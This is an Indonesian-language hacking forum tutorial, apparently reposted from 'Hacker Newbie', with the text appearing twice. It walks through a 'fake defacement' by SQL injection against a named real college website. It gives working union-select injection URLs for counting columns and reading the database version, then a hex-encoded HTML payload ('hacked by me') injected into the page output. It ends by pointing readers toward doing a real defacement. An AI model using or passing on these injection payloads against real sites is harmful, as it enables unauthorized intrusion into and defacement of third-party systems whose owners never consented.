langsung aja yahh..
deface palsu via sql injection?
maksudnya?
buat yg master,jgn d baca yahhh...
cm niat utk share kok...hhe ..
pertama,jadi yg kita lakuakn cm deface palsu...deface yg hanya bs d baca dr sisi client,seperti XSS..
gmn crnya ?
lnjut ..
1.Siapin target ,mau SQL versi 4 atau versi 5 jg boleh.
kl lupa nihh
2.nah misal ud dpt target nihh..
3.cek versinya...
eh ternyata versi 4..
drpd cape ngeblind..
yaudah buat gaya2an..deface palsu ajaa..
kalian tw kan yg ngerubah ascii jd hex code?
kl bingung,
buka ini
nah coba buat script deface,misal
masukin ke bagian ASCII yg ada d web dieq41..
trus kl ud d masukin..
liat bagian hexadecimal,bakal muncul:
nah kode d atas tuh kodehasil convert dr ascii ke hex..
nah,,skrg yg kode 3C68313E6861636B6564206279206D653C2F68313E ditambah 0x d depannya ...jadi
oke,coba masukin d angka 3 ,yg script hex nyaa..
Code:
ew.kok ada hacked by me?
hhe..itu tandanya udah berhasil sob..
makanya ak bilang ini cm client aja..
ask : kl mau deface bneran?
yaudah gawei dewek ..kan ad tutor sql injectionnya tuh..
ok sob smua,makasih2.
Sumber:: Hacker Newbie
deface palsu via sql injection?
maksudnya?
buat yg master,jgn d baca yahhh...
cm niat utk share kok...hhe ..
pertama,jadi yg kita lakuakn cm deface palsu...deface yg hanya bs d baca dr sisi client,seperti XSS..
gmn crnya ?
lnjut ..
1.Siapin target ,mau SQL versi 4 atau versi 5 jg boleh.
kl lupa nihh
Code:
http://hacker-newbie.org/showthread.php?tid=97
2.nah misal ud dpt target nihh..
Code:
http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,3,4,5,6,7,8,9--
3.cek versinya...
Code:
http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,@@version,4,5,6,7,8,9--
eh ternyata versi 4..
drpd cape ngeblind..
yaudah buat gaya2an..deface palsu ajaa..
kalian tw kan yg ngerubah ascii jd hex code?
kl bingung,
buka ini
Code:
http://dieq41.com/tools/text.html
Code:
<h1>hacked by me</h1>
trus kl ud d masukin..
liat bagian hexadecimal,bakal muncul:
Code:
3C68313E6861636B6564206279206D653C2F68313E
nah kode d atas tuh kodehasil convert dr ascii ke hex..
nah,,skrg yg kode 3C68313E6861636B6564206279206D653C2F68313E ditambah 0x d depannya ...jadi
Code:
0x3C68313E6861636B6564206279206D653C2F68313E
oke,coba masukin d angka 3 ,yg script hex nyaa..
Code:
http://www.stmikpontianak.ac.id/news.php?id=-70 union select 1,2,0x3C68313E6861636B6564206279206D653C2F68313E,4,5,6,7,8,9--
ew.kok ada hacked by me?
hhe..itu tandanya udah berhasil sob..
makanya ak bilang ini cm client aja..
ask : kl mau deface bneran?
yaudah gawei dewek ..kan ad tutor sql injectionnya tuh..
ok sob smua,makasih2.
Sumber:: Hacker Newbie